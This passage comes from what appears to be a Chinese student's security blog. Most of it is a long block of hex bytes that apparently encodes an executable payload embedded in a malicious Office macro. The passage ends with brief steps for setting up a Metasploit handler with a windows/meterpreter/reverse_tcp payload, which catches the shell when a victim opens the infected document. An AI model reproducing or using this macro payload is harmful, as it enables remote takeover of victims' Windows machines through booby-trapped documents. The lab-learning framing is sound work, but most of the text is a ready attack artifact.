3D&HF8&HAD&HE8&H68&H21&HEB&H2F&H90&H09&HEF&H4E&H76&H1F&HD5&H20&HCB&HA2&HBC&H43&HC1&HFA&H32&HEE&H6D&H57&HEE&HEF&H4B&HC1&H02&H6D&H92&H37&H9F&H20&H4E&H3B&H35&H23&H42&H50&H63&H5F&HAC&H20&H9E&H07&HD6&H6C&HEB&H3B&H5A&H19&H6E&H67&H9E&H99&H07&H7E&H15&H37&H0A&H6B&HE6&H1B&H2E&H85&HEE&H8A&H3C&HF9&HAB&H1F&H0B&H29&H0B&H74&H07&H6B&H37&HB3&HE7&H1D&H73&HDB&HD2&H72&HE4&HB5&H95&H21&H52&HC1&HCD&H6D&H52&H8F&H1E&H27&H36&HE2&HD4&H11&H0E&HB3&HB6&H06&H5A&HFF&H68&H04&HD1&H50&HA1&H18&H96&HCD&HD5&HA4&HB1&H00&H86&H41&HAC&H8C&H84&H08&H87&HD8&H41&H9C&H48&H21&H03&H55&H97&HC6&H2C&H88&H37&HE4&H13&H41&HDF&H44&H26&H1B&H84&H52&H83&H5A&H96&HCC&HF6&H2D&HFD&HAA&H12&H23&H0B&H00&H41&H36&H6E&H3E&H24&H7E&HBC&H75&HAC&H68&HD7&HC8&HDB&H38&H91&H7B&H6B&HD7&H0C&H53&H17&H80&HE1&HD8&HE3&HEF&H26&H7D&HF2&HD8&H72&HE8&H90&H93&HC9&H3C&H1C&H06&HF5&H6C&HEC&H39&H94&HD4&H05&HCD&H1F&HC5&H36&HBF&H29&H1B&HCC&HC4&H71&H57&H47&H27&H9B&H91&H87&HB3&H60&H5F&H94&HE7&HC1&H59&H66&H56&H6B&HA8&H34&H8A&H64&HBC&H1D&HD5&H74&H1C&H49&H20&H27&HA7&HF8&HA3&HBB&H02&H44&H76&H6F&H5A&H63&H4E&H72&HE7&H89&HC2&HBB&H5D&H95&HF3&H71&H4C&H44&H7F&HBF&HCB&HDD&HD2&H05&H1F&H66&H50&H8F&HB6&H95&H1D&H25&HB8&H01&H70&HA5&H07&H76&H49&HBD&HAE&H98&H3C&H96&HED&HBE&H11&H55&H79&H09&HA2&HA3&H35&H15&H36&H24&H59&H53&HF3&H1A&H87&HE9&HBB&H42&H79&H8C&HBF&H71&H03&HE7&HEA&HF4&HF6&H85&HE5&HC5&H3A&H50&HCA&HE2&HEC&H0A&H95&H81&HE5&H65&H69&H08&H62&H44&HE8&H47&H14&HEF&H89&H07&HAF&HAA&H8A&HC6&HB7&HA5&H8B&HDC&H63&HE3&HFA&H65&H8B&HD8&H01&HF2&HEF&H39&H38&H45&H7E&H9B&HF5&HFD&HC0&H59&H70&H5C&H60&HC9&H06&HC8&HE6&H65&HEB&H26&H80&H27&HB7&H08&H8D&H6B&HBE&H06&H45&HF2&HB3&H9D&HE9&HE4&H29&H82&H74&H34&HF3&HB6&HDE&H75&HE5&H43&H9C&HE9&H4D&HE8&H22&HD4&HA3&H31&H4E&H09&H18&H8E&HE8&H2B&H81&HE4&HB6&H81&HF8&H82&HF3&HE2&H0D&HA3&H5E&HD1&HDF&HB4&H7C&H49&HEF&HC5&H5D&H4A&H4D&HFE&H2D&HAB&H6D&H7D&H15&H90&H50&H80&HCF&HB3&H8C&H4E&HCD&H60&HEA&HD0&H1E&H29&H39&HEE&H2F&H5A&H65&HC0&HA4&HCD&HC4&H77&HF1&HF1&H44&H0A&H17&H9D&HE0&H46&HAC&H4D&HD7&H72&H8E&H79&H2A&HBB&H41&H6F&H3D&H77&H59&HF0&HFD&H46&HD9&H40&HFB&H85&HD1&H1E&H56&H8F&H69&HBD&H82&H12&HD1&H56&H89&H9A&H92&H09&HBA&HAE&HA6&HB2&H32&H67&H58&HC9&HD5&H3A&H94&HC8&H9E&H2F&H48&H13&H99&HEF&HB8&H37&HC0&H55&H3F&H5F&H76&H7A&H36&HE6&H88&HAF&H97&HBF&HDA&H4B&HF4&H21&HF3&H16&H85&HDC&HA5&H3A&HF4&H5F&H14&HF2&HF2&H84&H28&HA7&HD0&HB4&H37&HFE&HD8&H19&H9D&HEC&HE5&H00&H9C&HCB&HC2&H03&H5A&HC7&H6D&HDA&H99&H99&H85&H7B&HA0&HC3&HF6&H5E&H41&HEB&H88&H9F&HD8&H9F&H6F&H33&HD4&H22&HA2&H31&H86&H75&H9E&H9F&H95&H50&H2E&H14&H53&HF7&H84&H5D&H95&H8C&HFE&HB3&H11&H30&HD5&H80&H0B&H81&H7B&H0C&H3F&HB0&H94&H68&H61&HBA&HC5&H8E&HE4&HF2&HB7&HE1&H1A&HCB&HED&H78&H9F&H6E&H70&HC9&H20&H65&H4C&H2C&H5A&HBD&H05&H24&H31&H50&H8C&H86&H10&H03&H81&HE2&H34&H3A&H74&HF7&H92&H48&H5D&H67&H5C&HA5&H72&HE8&H3D&HC7&H44&H2D&HC2&H31&H13&H87&H31&HBE&H73&H42&H61&H78&HCB&H8A&H43&H30&H01&H54&H66&H18&H41&HB0&H5D&H7A&H03&H89&HAB&H34&HE2&H9C&HBC&H62&HB6&H5F&HE5&H4C&H12&H34&HA8&H92&H0C&H2B&HED&H4A&HDE&H5C&H62&HFF&H02&H36&H13&H47&HC4&H2B&H13&HA8&H62&H53&H62&H2D&H80&H03&H4E&H01&H79&H91&H4C&H1C&HE4&H3A&HCF&HFB&H8F&HAD&H63&HDD&HBE&HF6&HF5&HEE&HD9&H15&H82&H4B&H6A&HDE&H66&H98&H2B&H65&H7B&H7F&HF6&H5B&H43&H55&HE2&HAF&H69&H18&H8E&HC1&H8F&H38&HD7&HC8&HE0&H2B&H99&H0E&HAD&HA4&H4D&H6B&H2E&H22&HFB&HD6&HD6&HEB&HCC&H68&H56&H3F&HD0&H1E&H68&H44&HF1&H45&H1E&H09&H39&H63&H8F&HCB&H29&H30&HC3&H21&H6E&HF0&HE6&HAD&HFB&H93&H21&H96&HA5&H84&H7D&H97&H6E&H50&H20&H23&H4F&HAF&H3C&HAE&H4C&H21&HE1&HF1&HFE&H13&H65&H6D&H56&H0C&HC2&HD8&H57&HB0&H49&H9E&H57&H78&H6C&H62&H15&H29&H2D&H90&HAF&HD5&H36&HF6&HD1&H6C&H37&H76&HB9&HCF&H6E&HDD&H8C&HF8&H80&H9F&HE9&H81&H0C&HA2&HCA&H45&H5A&H45&H59&HE9&H24&H1F&HB5&H91&H0B&H0A&H43&H44&H81&HA3&H6C&H2C&H6D&H83&HF2&HD8&HA3&HDA&HC3&HB9&HE5&H97&H87&H09&HFF&HEF&H1E&HBE&H6B&H1A&H47&H02&H53&HD4&HC7&H65&HAB&H64&H0D&HAB&H0B&H7D&HF0&H45&H0A&H5C&H6F&HF5&HE5&H06&HB9&H2F&H1A&HB4&HB6&HB6&H8F&H67&H8F&H6F&HC8&H83&HBE&H50&HF8&H8F&H91&H50&HE4&H69&HFD&H46&H23&HA3&HAF&HA4&H99&H82&H20&H7D&H0A&H0D&H99&H4D&H61&HA3&HBD&H1A&H29&HF7&HF3&H2D&H5C&HCB&HB2&H84&HC4&H1F&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00
&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H2C&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H54&H30&H00&H00&H38&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H30&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H30&H00&H00&H00&H00&H00&H00&H9C&H00&H45&H78&H69&H74&H50&H72&H6F&H63&H65&H73&H73&H00&H00&H00&H00&H30&H00&H00&H4B&H45&H52&H4E&H45&H4C&H33&H32&H2E&H64&H6C&H6C&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H02&H18&H59&HC2&HD2&H36&HA2&H63&HEB&HE4&H2B&H75&HBD&H53&HB9&H03&H68&HDE&HF3&H0D&H28&H81&HAE&HB3&HCA&HDA&HDE&HEC&H53&H9B&HD5&H65&HD0&H08&H4B&H7A&H34&HE5&HF2&H72&H35&HF1&H2B&H59&H32&H85

  1. 监听设置

      模块为:exploit/multi/handler

  payload为:windows/meterpreter/reverse_tcp

  设置本机地址的LHOST和监听端口号LPORT

  2. 靶机运行文档,宏感染随文件传递

    靶机画面:

10

攻击方画面:

11

小时候在大人的教育下崇拜他;
少年时在敌人的忽悠下怀疑他;
长大后在自己的探索中敬佩他。

11

© 2021 叱月的小冰窖

avatar

叱月的个人博客
有一天,蜗牛也会变“佬”……

Docker Kali渗透 Mysql Ruoyi 优化 容器化 感概 网络安全 项目部署
关于我

叱月❤️的 ❤️ 博客

记录一些技术上的事

一名大四学生🕯️

马上毕业于青岛理工大学琴岛学院

– 2021 年 07 月 2 日更新

社交链接